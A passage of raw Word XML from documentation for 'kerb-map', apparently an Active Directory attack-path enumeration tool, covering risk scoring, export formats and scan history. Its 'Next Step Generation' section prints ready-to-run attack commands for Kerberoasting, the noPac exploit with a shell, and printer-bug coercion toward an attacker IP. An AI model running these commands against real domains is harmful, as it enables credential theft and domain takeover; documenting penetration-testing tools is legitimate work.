            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>HIGH</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2340" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="10000047" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Weak DC Encryption</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2340" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="10000048" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>65</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2340" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="10000049" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>None</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2340" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="1000004A" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>HIGH</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2340" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="1000004B" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>DES Account</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2340" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="1000004C" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>60</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2340" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="1000004D" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>None</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2340" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="1000004E" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>HIGH</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2340" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="1000004F" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Trust Abuse (forest)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2340" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="20000025" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>90</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2340" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="20000026" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Forest trust, no SID filter</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2340" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="20000027" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CRITICAL</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2340" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="20000028" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Trust Abuse (bidir)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2340" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="20000029" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>75</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2340" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="2000002A" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Bidirectional, no SID filter</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2340" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="10000050" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>HIGH</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="41DE5D7D" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AB54F58" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="2" w:color="2471A3"/>
        </w:pBdr>
      </w:pPr>
      <w:bookmarkStart w:id="37" w:name="_Toc224561317"/>
      <w:r>
        <w:t>6.2  Next Step Generation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="37"/>
    </w:p>
    <w:p w14:paraId="68B188A8" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>Every entry in the priority list includes a pre-filled command to execute the attack. The tool substitutes in the discovered account names and domain information so the output is immediately usable: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5BC7BA8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DD47CE1" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="A8D8EA"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t># Example output for a Kerberoastable account:</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00707BE4" w14:paraId="008013B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84A9698" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="A8D8EA"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>GetUserSPNs.py corp.local/jsmith:Password123 -request-user svc_sql -outputfile svc_sql.hash</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00707BE4" w14:paraId="3D038D2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C8247A6" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="A8D8EA"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00707BE4" w14:paraId="7FA5766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C4B4BBD" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="A8D8EA"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t># Example output for noPac:</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00707BE4" w14:paraId="47BBD86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9BD8C4B" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="A8D8EA"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>python noPac.py corp.local/lowpriv:Password -dc-ip 192.168.1.10 -shell</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00707BE4" w14:paraId="5C5C6612"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C6A12B5" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="A8D8EA"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00707BE4" w14:paraId="15A81E4D"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FC4A2D8" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="A8D8EA"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t># Example output for unconstrained delegation:</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00707BE4" w14:paraId="0C426E6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D9F1DAD" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="A8D8EA"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>python printerbug.py corp.local/jsmith:pass@WEBSERVER01.corp.local &lt;ATTACKER_IP&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6B926FA9" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BD2851A" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="06492711" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="38" w:name="_Toc224561318"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>7.  Output &amp; Export</w:t>
      </w:r>
      <w:bookmarkEnd w:id="38"/>
    </w:p>
    <w:p w14:paraId="3F6C6AF4" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="2" w:color="2471A3"/>
        </w:pBdr>
      </w:pPr>
      <w:bookmarkStart w:id="39" w:name="_Toc224561319"/>
      <w:r>
        <w:t>7.1  Terminal Output</w:t>
      </w:r>
      <w:bookmarkEnd w:id="39"/>
    </w:p>
    <w:p w14:paraId="3D4FD9D3" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>kerb-map uses the Rich library to produce structured, colour-coded terminal output. Each module's results are displayed in their own section, followed by the cross-correlated priority target table and a summary footer that identifies the single best first move.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B643C8F" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F7409AD" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>Output sections:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71A3EF83" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>Domain Overview — functional level, password policy snapshot, MachineAccountQuota</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3928613D" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>Kerberoastable Accounts — account table with crack score, encryption type, and password age</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D272352" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>AS-REP Roastable Accounts — accounts with pre-auth disabled</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4182E98A" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>Kerberos Delegation — unconstrained hosts, constrained accounts, RBCD targets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56462A6C" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>Domain User Analysis — privileged users, stale accounts, DnsAdmins, LAPS, trusts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CD66286" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>CVE / Misconfiguration Checks — per-CVE results with vulnerable/not-vulnerable status</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278EA119" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>Priority Attack Paths — unified ranked list with next-step commands</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25C6FD92" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>Scan Summary — counts, recommended first move</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DFA9A70" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="720390B4" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="2" w:color="2471A3"/>
        </w:pBdr>
      </w:pPr>
      <w:bookmarkStart w:id="40" w:name="_Toc224561320"/>
      <w:r>
        <w:t>7.2  JSON Export (-o json)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="40"/>
    </w:p>
    <w:p w14:paraId="0DD33750" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>Writes the complete scan results as a structured JSON file. The file contains every field from every module including raw evidence, full account lists, CVE details, and the complete ranked target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735C7FC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AFDBD85" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="A8D8EA"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>python kerb-map.py -d corp.local -dc 192.168.1.10 -u jsmith -p pass -o json</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00707BE4" w14:paraId="5D7455C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E9E6423" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="A8D8EA"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t># Outputs: kerb-map_corp.local_20240115_143022.json</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00707BE4" w14:paraId="7AB6DF9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30B7C92" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="A8D8EA"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00707BE4" w14:paraId="0DCE5075"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4AD0CBB" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="A8D8EA"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t># Custom filename:</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00707BE4" w14:paraId="4986D328"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EF148E8" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="A8D8EA"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>python kerb-map.py ... -o json --outfile engagement_day1.json</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="545F8E6E" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70E7F730" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="2" w:color="2471A3"/>
        </w:pBdr>
      </w:pPr>
      <w:bookmarkStart w:id="41" w:name="_Toc224561321"/>
      <w:r>
        <w:t>7.3  BloodHound Export (-o bloodhound)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="41"/>
    </w:p>
    <w:p w14:paraId="0E02D57E" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>Writes a BloodHound-compatible JSON file containing custom nodes for Kerberoastable and AS-REP Roastable accounts, plus delegation nodes for Unconstrained (Computer type), Constrained (User type with allowedtodelegate), and RBCD targets (Computer type). Properties include hasspn, dontreqpreauth, unconstraineddelegation, and trustedtoauth flags. This file can be imported directly into BloodHound for visual path analysis.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DC4E95D" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26395D2B" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="2" w:color="2471A3"/>
        </w:pBdr>
      </w:pPr>
      <w:bookmarkStart w:id="42" w:name="_Toc224561322"/>
      <w:r>
        <w:t>7.4  Scan History Database</w:t>
      </w:r>
      <w:bookmarkEnd w:id="42"/>
    </w:p>
    <w:p w14:paraId="01B7FFEF" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>Every scan is automatically saved to a local SQLite database at ~/.kerb-map/results.db. This allows you to:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AE227FA" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
